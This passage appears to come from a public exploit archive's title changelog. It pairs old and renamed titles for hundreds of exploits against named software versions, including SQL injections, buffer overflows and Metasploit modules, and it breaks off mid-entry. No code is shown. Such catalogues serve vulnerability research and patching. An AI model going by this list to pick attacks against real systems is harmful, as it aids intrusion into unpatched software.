Remote Crash Apple Safari 3.2.2/4b - (nested elements) XML Parsing Remote Crash Gravity Board X 2.0b - SQL Injection / Authenticated Code Execution Gravity Board X 2.0 Beta - SQL Injection / Authenticated Code Execution Online Guestbook Pro - (display) Blind SQL Injection Esoftpro Online Guestbook Pro - (display) Blind SQL Injection tematres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities TemaTres 1.0.3 - (Authentication Bypass / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities ZaoCMS - (user_id) SQL Injection ZaoCMS - 'user_id' SQL Injection Safari - RSS 'feed://' Buffer Overflow via libxml2 (PoC) Apple Safari - RSS 'feed://' Buffer Overflow via libxml2 (PoC) ZeeCareers 2.0 - (addAdminmembercode.php) Add Admin ZeeCareers 2.0 - 'addAdminmembercode.php' Add Admin AdPeeps 8.5d1 - Cross-Site Scripting / HTML Injection Impact Software AdPeeps 8.5d1 - Cross-Site Scripting / HTML Injection WebBoard 2.90 Beta - Remote File Disclosure 212Cafe WebBoard 2.90 Beta - Remote File Disclosure ZeusCart 2.3 - (maincatid) SQL Injection ZeusCart 2.3 - 'maincatid' SQL Injection DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC) Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC) OtsAv DJ/TV/Radio - Multiple Local Heap Overflow PoCs otsAV DJ/TV/Radio - Multiple Local Heap Overflow PoCs Microsoft Office Web Components (Spreadsheet) - ActiveX Buffer Overflow (PoC) Microsoft Office Web Components (OWC) Spreadsheet - ActiveX Buffer Overflow (PoC) DD-WRT - (httpd service) Remote Command Execution DD-WRT HTTPd Daemon/Service - Remote Command Execution GLinks 2.1 - (cat) Blind SQL Injection Groone's GLink ORGanizer 2.1 - (cat) Blind SQL Injection XOOPS celepar module qas - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities XOOPS Celepar Module Qas - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (PoC) Sun xVM VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot (PoC) Amaya 11.2 W3C Editor/Browser - (defer) Remote Buffer Overflow (SEH) Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH) Payment Processor Script - 'shop.htm cid' SQL Injection Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) Buffer Overflow (PoC) Apple Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) Buffer Overflow (PoC) BandCMS 0.10 - news.php Multiple SQL Injection Rock Band CMS 0.10 - news.php Multiple SQL Injection Microsoft IIS 5.0 (Windows 2000 SP4) - FTP Server Remote Stack Overflow Microsoft IIS 5.0 FTP Server (Windows 2000 SP4) - Remote Stack Overflow Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service Eureka Mail Client 2.2q - PoC Buffer Overflow Eureka Email Client 2.2q - PoC Buffer Overflow Solaris 8.0 - LPD Command Execution (Metasploit) Solaris 8.0 LPD - Command Execution (Metasploit) Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit) Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit) Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit) Knox Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit) ntpd 4.0.99j-k readvar - Buffer Overflow (Metasploit) NTPd 4.0.99j-k readvar - Buffer Overflow (Metasploit) Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit) PoPToP < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit) BulletProof FTP 2.63 b56 - Client Malformed '.bps' File Stack Buffer Overflow BulletProof FTP Client 2.63 b56 - Malformed '.bps' File Stack Buffer Overflow Dopewars 1.5.12 Server - Denial of Service Dopewars Server 1.5.12 - Denial of Service Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities (Metasploit) Free Download Manager - Torrent File Parsing Multiple Remote Buffer Overflow Vulnerabilities (Metasploit) HP LaserJet printers - Multiple Persistent Cross-Site Scripting Vulnerabilities HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities Salim Gasmi GLD 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit) Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit) Adobe Shockwave 11.5.1.601 Player - Multiple Code Execution Adobe Shockwave Player 11.5.1.601 - Multiple Code Execution HP Power Manager Administration - Universal Buffer Overflow Hewlett-Packard (HP) Power Manager Administration Power Manager Administration - Universal Buffer Overflow Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service HP Openview NNM 7.53 - Invalid DB Error Code HP OpenView Network Node Manager (OV NNM) 7.53 - Invalid DB Error Code Quick.Cart 3.4 and Quick.CMS 2.4 - Cross-Site Request Forgery Quick.Cart 3.4 / Quick.CMS 2.4 - Cross-Site Request Forgery Eureka Mail Client - Remote Buffer Overflow Eureka Email Client - Remote Buffer Overflow IDEAL Administration 2009 9.7 - Local Buffer Overflow PointDev IDEAL Administration 2009 9.7 - Local Buffer Overflow phpshop 0.8.1 - Multiple Vulnerabilities phpShop 0.8.1 - Multiple Vulnerabilities IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit) PointDev IDEAL Administration 2009 9.7 - Buffer Overflow (Metasploit) HP NNM 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow HP OpenView Network Node Manager (OV NNM) 7.53 - ovalarm.exe CGI Unauthenticated Remote Buffer Overflow DigitalHive - Multiple Vulnerabilities Digital Hive - Multiple Vulnerabilities zabbix server - Multiple Vulnerabilities Zabbix Server - Multiple Vulnerabilities freekot - (Authentication Bypass) SQL Injection Digiappz Freekot - (Authentication Bypass) SQL Injection TFTP Daemon 1.9 - Denial of Service Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Denial of Service B2B Trading Marketplace - SQL Injection SoftBiz B2B trading Marketplace Script - SQL Injection Mini-stream - Windows XP SP2 and SP3 Exploit Mini-stream Ripper (Windows XP SP2/SP3) - Exploit Audiotran 1.4.1 - (Win XP SP2/SP3 English) Buffer Overflow Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Buffer Overflow Safari 4.0.4 / Firefox 3.5.7 / SeaMonkey 2.0.1 - Remote Denial of Service Apple Safari 4.0.4 / Firefox 3.5.7 / SeaMonkey 2.0.1 - Remote Denial of Service iTunes 9.0.1 - '.pls' Handling Buffer Overflow Apple iTunes 9.0.1 - '.pls' Handling Buffer Overflow Apple Safari 4.0.4 & Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service/PoC Apple Safari 4.0.4 / Google Chrome 4.0.249 - CSS style Stack Overflow Denial of Service (PoC) Safari 4.0.4 (531.21.10) - Stack Overflow/Run Denial of Service Apple Safari 4.0.4 (531.21.10) - Stack Overflow/Run Denial of Service bild flirt system 2.0 - 'index.php' 'id' SQL Injection Bild Flirt System 2.0 - 'index.php' 'id' SQL Injection SAFARI APPLE 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash) Apple Safari 4.0.5 - (object tag) 'JavaScriptCore.dll' Denial of Service (Crash) iOS Safari - Bad 'VML' Remote Denial of Service iOS Safari - Remote Denial of Service Apple iOS Safari - Bad 'VML' Remote Denial of Service Apple iOS Safari - Remote Denial of Service HP OpenView NNM - OvWebHelp.exe CGI Topic Overflow HP OpenView Network Node Manager (OV NNM) - OvWebHelp.exe CGI Topic Overflow Adobe Reader - Escape From PDF Adobe Reader - Escape From '.PDF' TugZip 3.5 - '.ZIP' File Buffer Overflow TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow Joomla! Component jp_jobs - SQL Injection Joomla! Component com_jp_jobs - SQL Injection Joomla! Component QPersonel - SQL Injection Joomla! Component com_QPersonel - SQL Injection Bild Flirt 1.0 - SQL Injection Bild Flirt System 1.0 - SQL Injection Safari 4.0.5 - (531.22.7) Denial of Service Apple Safari 4.0.5 - (531.22.7) Denial of Service Webkit (Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service Webkit (Apple Safari 4.0.5) - Blink Tag Stack Exhaustion Denial of Service Safari 4.0.3 / 4.0.4 - Stack Exhaustion Apple Safari 4.0.3 / 4.0.4 - Stack Exhaustion 724CMS Enterprise 4.59 - SQL Injection PHPKB Knowledge Base Software 2.0 - Multilanguage Support - Multiple SQL Injections 724CMS 4.59 Enterprise - SQL Injection PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections Joomla! Component JE Job - Local File Inclusion Joomla! Component com_jejob JE Job 1.0 - Local File Inclusion Safari 4.0.5 - parent.close() Memory Corruption (ASLR + DEP Bypass) Apple Safari 4.0.5 - parent.close() Memory Corruption (ASLR + DEP Bypass) Joomla! Component com_jejob 1.0 - 'catid' SQL Injection Joomla! Component com_jejob JE Job 1.0 - 'catid' SQL Injection Savy Soda Documents - (Mobile Office Suite) XLS Denial of Service Office^2 iPhone - XLS Denial of Service GoodiWare GoodReader iPhone - XLS Denial of Service Savy Soda Documents - (Mobile Office Suite) '.XLS' Denial of Service Office^2 iPhone - '.XLS' Denial of Service GoodiWare GoodReader iPhone - '.XLS' Denial of Service Yamamah (news) - SQL Injection / Source Code Disclosure Yamamah - 'news' SQL Injection / Source Code Disclosure Unreal IRCD 3.2.8.1 - Remote Downloader/Execute Trojan UnrealIRCd 3.2.8.1 - Remote Downloader/Execute Trojan k-search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities K-Search - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities YPNinc JokeScript - (ypncat_id) SQL Injection YPNinc JokeScript - 'ypncat_id' SQL Injection YPNinc PHP Realty Script - (docID) SQL Injection YPNinc PHP Realty Script - 'docID' SQL Injection HP OpenView NNM - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution HP OpenView NNM - getnnmdata.exe CGI Invalid ICount Remote Code Execution HP OpenView NNM - getnnmdata.exe CGI Invalid Hostname Remote Code Execution HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid MaxAge Remote Code Execution HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid ICount Remote Code Execution HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe CGI Invalid Hostname Remote Code Execution Apple Mac OSX (Snow Leopard) EvoCam Web Server - ROP Remote Exploit Apple Mac OSX EvoCam Web Server (Snow Leopard) - ROP Remote Exploit HP NNM 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH) HP OpenView Network Node Manager (OV NNM) 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH) Safari Browser 4.0.2 - Clickjacking Apple Safari 4.0.2 - Clickjacking Barcodewiz 3.29 - Barcode ActiveX Control Remote Heap Spray Exploit (Internet Explorer 6/7' Barcodewiz Barcode ActiveX Control 3.29 - Remote Heap Spray Exploit (Internet Explorer 6/7) Apple iOS - pdf Jailbreak Exploit Apple iOS - '.pdf' Jailbreak Exploit HP OpenView NNM 7.53 OvJavaLocale - Buffer Overflow HP OpenView Network Node Manager (OV NNM) 7.53 - OvJavaLocale Buffer Overflow Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking Microsoft PowerPoint 2010 - 'pptimpconv.dll' DLL Hijacking Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking Apple Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking MediaPlayer Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking Media Player Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking HP OpenView NNM - webappmon.exe execvp_nc Remote Code Execution HP OpenView Network Node Manager (OV NNM) - webappmon.exe execvp_nc Remote Code Execution AdaptCMS 2.0.1 Beta Release - Remote File Inclusion (Metasploit) AdaptCMS 2.0.1 Beta - Remote File Inclusion (Metasploit) DATAC RealWin 2.0 (Build 6.1.8.10) - Buffer Overflow DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - Buffer Overflow FatPlayer 0.6b - '.wav' Buffer Overflow (SEH) Fat Player 0.6b - '.wav' Buffer Overflow (SEH) CubeCart 2.0.1 - SQL Injection Brooky CubeCart 2.0.1 - SQL Injection DATAC RealWin SCADA 1.06 - Buffer Overflow DATAC RealWin SCADA Server 1.06 - Buffer Overflow pilot cart 7.3 - Multiple Vulnerabilities ASPilot Pilot Cart 7.3 - Multiple Vulnerabilities Mp3-Nator 2.0 - Buffer Overflow (SEH) MP3-Nator 2.0 - Buffer Overflow (SEH) Safari 5.02 - Stack Overflow Denial of Service Apple Safari 5.02 - Stack Overflow Denial of Service Microsoft Windows Task Scheduler - Privilege Escalation Microsoft Windows - Task Scheduler Privilege Escalation Pandora Fms 3.1 - Authentication Bypass Pandora FMS 3.1 - Authentication Bypass bugtracker.net 3.4.4 - Multiple Vulnerabilities BugTracker.NET 3.4.4 - Multiple Vulnerabilities Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (Metasploit) Viscom Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (Metasploit) Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow Viscom Image Viewer CP Gold 6 - ActiveX TifMergeMultiFiles() Buffer Overflow WMITools ActiveX - Remote Command Execution Microsoft WMITools ActiveX - Remote Command Execution VideoSpirit Pro 1.68 - Local Buffer Overflow VeryTools VideoSpirit Pro 1.68 - Local Buffer Overflow Apple Mac OSX iTunes 8.1.1 - ITms Overflow (Metasploit) Apple iTunes 8.1.1 (Mac OSX) - ITms Overflow (Metasploit) PeaZip 2.6.1 - Zip Processing Command Injection (Metasploit) PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit) Sun Java - System Web Server WebDAV OPTIONS Buffer Overflow (Metasploit) Sun Java Web Server - System WebDAV OPTIONS Buffer Overflow (Metasploit) Apache Tomcat Manager Application Deployer - Authenticated Code Execution (Metasploit) Apache Tomcat Manager - Application Deployer Authenticated Code Execution (Metasploit) Solaris sadmind - Command Execution (Metasploit) Solaris Sadmind - Command Execution (Metasploit) Sun Solaris - Telnet Remote Authentication Bypass (Metasploit) Sun Solaris Telnet - Remote Authentication Bypass (Metasploit) Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit) Oracle 8i TNS Listener - 'ARGUMENTS' Buffer Overflow (Metasploit) Motorola Timbuktu Pro - Directory Traversal / Arbitrary File Upload (Metasploit) Oracle 8i - TNS Listener 'ARGUMENTS' Buffer Overflow (Metasploit) TFTPDWIN 0.4.2 - Long Filename Buffer Overflow (Metasploit) 3CTftpSvc TFTP - Long Mode Buffer Overflow (Metasploit) Quick FTP Pro 2.1 - Transfer-Mode Overflow (Metasploit) ProSysInfo TFTP server TFTPDWIN 0.4.2 - Long Filename Buffer Overflow (Metasploit) 3Com TFTP Service (3CTftpSvc) - Long Mode Buffer Overflow (Metasploit) Quick TFTP Server Pro 2.1 - Transfer-Mode Overflow (Metasploit) Allied Telesyn TFTP Server 1.9 - Long Filename Overflow (Metasploit) Allied Telesyn TFTP (AT-TFTP) Server/Daemon 1.9 - Long Filename Overflow (Metasploit) CA BrightStor - ARCserve for Laptops & Desktops LGServer (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow (Metasploit) CA BrightStor ARCserve for Laptops & Desktops LGServer - (rxsSetDataGrowthScheduleAndFilter) Buffer Overflow (Metasploit) Eureka Email 2.2q - ERR Remote Buffer Overflow (Metasploit) (2) Eureka Email Client 2.2q - ERR Remote Buffer Overflow (Metasploit) (2) FreeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit) freeSSHd 1.0.9 - Key Exchange Algorithm String Buffer Overflow (Metasploit) Kerio Firewall 2.1.4 - Authentication Packet Overflow (Metasploit) Arkeia Backup Client Type 77 (Windows x86) - Overflow Exploit (Metasploit) Kerio Personal Firewall 2.1.4 - Authentication Packet Overflow (Metasploit) Knox Arkeia Backup Client Type 77 (Windows x86) - Overflow Exploit (Metasploit) Mercury/32 <= 4.01b - LOGIN Buffer Overflow (Metasploit) Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow (Metasploit) MailEnable IMAPD (2.35) - Login Request Buffer Overflow (Metasploit) Mercur 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit) Mdaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (2) Mercury/32 Mail Server <= 4.01b - LOGIN Buffer Overflow (Metasploit) Eudora Qualcomm WorldMail 3.0 - IMAPD LIST Buffer Overflow (Metasploit) MailEnable IMAPD Professional (2.35) - Login Request Buffer Overflow (Metasploit) Mercur MailServer 5.0 - IMAP SP3 SELECT Buffer Overflow (Metasploit) MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (2) IMail IMAP4D - Delete Overflow (Metasploit) IPSwitch IMail IMAP4D - Delete Overflow (Metasploit) Mercury/32 4.01a - IMAP RENAME Buffer Overflow (Metasploit) Mercury/32 Mail Server 4.01a - IMAP RENAME Buffer Overflow (Metasploit) Ipswitch IMail - IMAP SEARCH Buffer Overflow (Metasploit) Ipswitch IMail Server - IMAP SEARCH Buffer Overflow (Metasploit) AOL Instant Messenger - goaway Overflow (Metasploit) AOL Instant Messenger AIM - goaway Overflow (Metasploit) Microsoft OWC Spreadsheet - msDataSourceObject Memory Corruption (Metasploit) Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (Metasploit) Zenturi ProgramChecker - ActiveX Control Arbitrary File Download (Metasploit) Zenturi ProgramChecker ActiveX - Control Arbitrary File Download (Metasploit) Tumbleweed FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit) Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit) RKD Software 'BarCodeAx.dll' 4.9 - ActiveX Remote Stack Buffer Overflow (Metasploit) RKD Software BarCode ActiveX Control 'BarCodeAx.dll' 4.9 - Remote Stack Buffer Overflow (Metasploit) RealNetworks RealPlayer - SMIL Buffer Overflow (Metasploit) RealNetworks RealPlayer - '.SMIL' Buffer Overflow (Metasploit) Adobe Shockwave - rcsL Memory Corruption (Metasploit) Adobe Shockwave Player - rcsL Memory Corruption (Metasploit) Microsoft Internet Explorer - VML Fill Method Code Execution (Metasploit) Microsoft Internet Explorer - (VML) Fill Method Code Execution (Metasploit) WebEx UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit) Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX NewObject Method Buffer Overflow (Metasploit) ACDSee - XPM File Section Buffer Overflow (Metasploit) ACDSee - '.XPM' File Section Buffer Overflow (Metasploit) HT-MP3Player 1.0 HT3 - File Parsing Buffer Overflow (Metasploit) HT-MP3Player 1.0 - '.HT3' File Parsing Buffer Overflow (Metasploit) Orbital Viewer - ORB File Parsing Buffer Overflow (Metasploit) Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit) Audio Workstation 6.4.2.4.3 - pls Buffer Overflow (Metasploit) Audio Workstation 6.4.2.4.3 - '.pls' Buffer Overflow (Metasploit) Qbik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit) QBik WinGate WWW Proxy Server - URL Processing Overflow (Metasploit) Medal Of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit) Medal of Honor Allied Assault - getinfo Stack Buffer Overflow (Metasploit) Cesar FTP 0.99g - (MKD) Command Buffer Overflow (Metasploit) CesarFTP 0.99g - (MKD) Command Buffer Overflow (Metasploit) Serv-U FTPD - MDTM Overflow (Metasploit) RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit) Ipswitch WS_FTP Server 5.05 - XMD5 Overflow (Metasploit) Ipswitch WS_FTP Server 5.05 - (XMD5) Overflow (Metasploit) 3Com 3CDaemon 2.0 FTP - 'Username' Overflow (Metasploit) 3Com 3CDaemon 2.0 FTP Server - 'Username' Overflow (Metasploit) FileCopa FTP Server pre 18 Jul Version - Exploit (Metasploit) FileCOPA FTP Server (Pre 18 Jul Version) - Exploit (Metasploit) SentinelLM - UDP Buffer Overflow (Metasploit) Sentinel LM - UDP Buffer Overflow (Metasploit) Apache module Mod_Rewrite - LDAP protocol Buffer Overflow (Metasploit) Xitami 2.5c2 Web Server - If-Modified-Since Overflow (Metasploit) Apache (mod_rewrite) - LDAP protocol Buffer Overflow (Metasploit) Xitami Web Server 2.5c2 - If-Modified-Since Overflow (Metasploit) Sambar 6 - Search Results Buffer Overflow (Metasploit) Sambar Server 6 - Search Results Buffer Overflow (Metasploit) IA WebMail 3.x - Buffer Overflow (Metasploit) IA WebMail Server 3.x - Buffer Overflow (Metasploit) Savant 3.1 Web Server - Overflow Exploit (Metasploit) Savant Web Server 3.1 - Overflow Exploit (Metasploit) HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit) Hewlett-Packard Power Manager Administration - Buffer Overflow (Metasploit) Hewlett-Packard (HP) Power Manager Administration - Buffer Overflow (Metasploit) Ipswitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit) IPSwitch WhatsUp Gold 8.03 - Buffer Overflow (Metasploit) PSO Proxy 0.91 - Stack Buffer Overflow (Metasploit) PSOProxy 0.91 - Stack Buffer Overflow (Metasploit) HP OpenView Network Node Manager - ovalarm.exe CGI Buffer Overflow (Metasploit) Apache mod_jk 1.2.20 - Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - ovalarm.exe CGI Buffer Overflow (Metasploit) Apache Tomcat mod_jk 1.2.20 - Buffer Overflow (Metasploit) NaviCOPA 2.0.1 - URL Handling Buffer Overflow (Metasploit) NaviCOPA Web Server 2.0.1 - URL Handling Buffer Overflow (Metasploit) MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow (Metasploit) Alt-N MDaemon 6.8.5 - WorldClient form2raw.cgi Stack Buffer Overflow (Metasploit) YPOPS 0.6 - Buffer Overflow (Metasploit) YahooPOPs (YPOPS) 0.6 - Buffer Overflow (Metasploit) Mercury Mail SMTP AUTH CRAM-MD5 - Buffer Overflow (Metasploit) Mercury/32 Mail SMTPD - AUTH CRAM-MD5 Buffer Overflow (Metasploit) IMail LDAP Service - Buffer Overflow (Metasploit) IPSwitch IMail LDAP Daemon/Service - Buffer Overflow (Metasploit) GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit) Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit) Poptop - Negative Read Overflow (Metasploit) UoW IMAP server - LSUB Buffer Overflow (Metasploit) PoPToP - Negative Read Overflow (Metasploit) UoW IMAPd Server - LSUB Buffer Overflow (Metasploit) DD-WRT HTTP Daemon - Arbitrary Command Execution (Metasploit) DD-WRT HTTPd Daemon/Service - Arbitrary Command Execution (Metasploit) Samba (Linux/x86) - trans2open Overflow (Metasploit) iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1) AppleFileServer - LoginExt PathName Overflow (Metasploit) Samba (Linux x86) - trans2open Overflow (Metasploit) Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1) AppleFileServer (OSX) - LoginExt PathName Overflow (Metasploit) Arkeia Backup Client Type 77 (OSX) - Overflow Exploit (Metasploit) Safari - Archive Metadata Command Execution (Metasploit) Knox Arkeia Backup Client Type 77 (OSX) - Overflow Exploit (Metasploit) Apple Safari - Archive Metadata Command Execution (Metasploit) iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2) Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2) Mail.app - Image Attachment Command Execution (Metasploit) Apple Mail.app - Image Attachment Command Execution (Metasploit) Apple Mac OSX QuickTime - RTSP Content-Type Overflow (Metasploit) Apple Mac OSX EvoCam - HTTP GET Buffer Overflow (Metasploit) Apple QuickTime (Mac OSX) - RTSP Content-Type Overflow (Metasploit) Apple Mac OSX EvoCam Web Server - HTTP GET Buffer Overflow (Metasploit) Samba trans2open (*BSD/x86) - Overflow Exploit (Metasploit) Samba (*BSD x86) - trans2open Overflow Exploit (Metasploit) PHP XML-RPC - Arbitrary Code Execution (Metasploit) XML-RPC Library 1.3.0 - 'xmlrpc.php' Arbitrary Code Execution (Metasploit) AWStats 6.4 < 6.5 migrate - Remote Command Execution (Metasploit) HP Openview - connectedNodes.ovpl Remote Command Execution (Metasploit) AWStats 6.4 < 6.5 - migrate Remote Command Execution (Metasploit) HP OpenView Network Node Manager (OV NNM) - connectedNodes.ovpl Remote Command Execution (Metasploit) TWiki Search Function - Arbitrary Command Execution (Metasploit) TWiki - Search Function Arbitrary Command Execution (Metasploit) Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit) The Matt Wright Guestbook.pl - Arbitrary Command Execution (Metasploit) Novell iPrint Client ActiveX Control 5.52 - Buffer Overflow (Metasploit) Novell iPrint Client 5.52 - ActiveX Control Buffer Overflow (Metasploit) Kolibri 2.0 - HTTP Server HEAD Buffer Overflow (Metasploit) Kolibri HTTP Server 2.0 - HEAD Buffer Overflow (Metasploit) 7-Technologies igss 9.00.00.11059 - Multiple Vulnerabilities 7-Technologies IGSS 9.00.00.11059 - Multiple Vulnerabilities HP OpenView NNM - nnmRptConfig nameParams Buffer Overflow (Metasploit) HP NNM - CGI webappmon.exe OvJavaLocale Buffer Overflow (Metasploit) HP NNM - CGI webappmon.exe execvp Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - nnmRptConfig nameParams Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI webappmon.exe OvJavaLocale Buffer Overflow (Metasploit) HP Network Node Manager (NMM) - CGI webappmon.exe execvp Buffer Overflow (Metasploit) HP OpenView NNM - nnmRptConfig.exe schdParams Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - nnmRptConfig.exe schdParams Buffer Overflow (Metasploit) HP OpenView Network Node Manager - getnnmdata.exe (ICount) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - ovwebsnmpsrv.exe main Buffer Overflow (Metasploit) HP OpenView Network Node Manager - getnnmdata.exe (MaxAge) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (ICount) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - ovwebsnmpsrv.exe main Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) getnnmdata.exe (MaxAge) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager - getnnmdata.exe (Hostname) CGI Buffer Overflow (Metasploit) HP OpenView Network Node Manager (OV NNM) - getnnmdata.exe (Hostname) CGI Buffer Overflow (Metasploit) VeryTools Video Spirit Pro 1.70 - '.visprj' Buffer Overflow (Metasploit) VeryTools VideoSpirit Pro 1.70 - '.visprj' Buffer Overflow (Metasploit) eyeos 1.9.0.2 - Persistent Cross-Site Scripting using image files eyeos 1.9.0.2 - Persistent Cross-Site Scripting Using Image Files Golden FTP 4.70 - PASS Stack Buffer Overflow (Metasploit) Golden FTP Server 4.70 - PASS Stack Buffer Overflow (Metasploit) manageengine support center plus 7.8 build 7801 - Directory Traversal ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal Safari 5.0.6/5.1 - SVG DOM Processing (PoC) Apple Safari 5.0.6/5.1 - SVG DOM Processing (PoC) Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass) Apple Safari 5.0.5 - SVG Remote Code Execution (DEP Bypass) TugZip 3.5 - '.ZIP' File Parsing Buffer Overflow (Metasploit) TugZip 3.5 Archiver - '.ZIP' File Parsing Buffer Overflow (Metasploit) Sports PHool 1.0 - Remote File Inclusion SportsPHool 1.0 - Remote File Inclusion Mini-stream 3.0.1.1 - Buffer Overflow (3) Mini-stream Ripper 3.0.1.1 - Buffer Overflow (3) Log1CMS 2.0 - (ajax_create_folder.php) Remote Code Execution Log1 CMS 2.0 - (ajax_create_folder.php) Remote Code Execution Zabbix 1.8.4 - (popup.php) SQL Injection Zabbix 1.8.4 - 'popup.php' SQL Injection CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit '.m3u' (Metasploit) CCMPlayer 1.5 - '.m3u' Stack based Buffer Overflow SEH Exploit (Metasploit) Serv-U FTP Server < 4.2 - Buffer Overflow (Metasploit) RhinoSoft Serv-U FTPd Server < 4.2 - Buffer Overflow (Metasploit) Family Connections - less.php Remote Command Execution (Metasploit) Family Connections CMS - 'less.php' Remote Command Execution (Metasploit) FCMS 2.7.2 CMS - Multiple Persistent Cross-Site Scripting Family CMS 2.7.2 - Multiple Persistent Cross-Site Scripting openemr 4 - Multiple Vulnerabilities Safari - GdiDrawStream BSoD OpenEMR 4 - Multiple Vulnerabilities Apple Safari - GdiDrawStream BSoD clip bucket 2.6 - Multiple Vulnerabilities Clipbucket 2.6 - Multiple Vulnerabilities Tube Ace(Adult PHP Tube Script) - SQL Injection Tube Ace (Adult PHP Tube Script) - SQL Injection Dolibarr CMS 3.2.0 < Alpha - File Inclusion Dolibarr 3.2.0 < Alpha - File Inclusion PBLang - Local File Inclusion PBLang Bulletin Board System - Local File Inclusion NetDecision 4.5.1 - HTTP Server Buffer Overflow (Metasploit) Netmechanica NetDecision HTTP Server 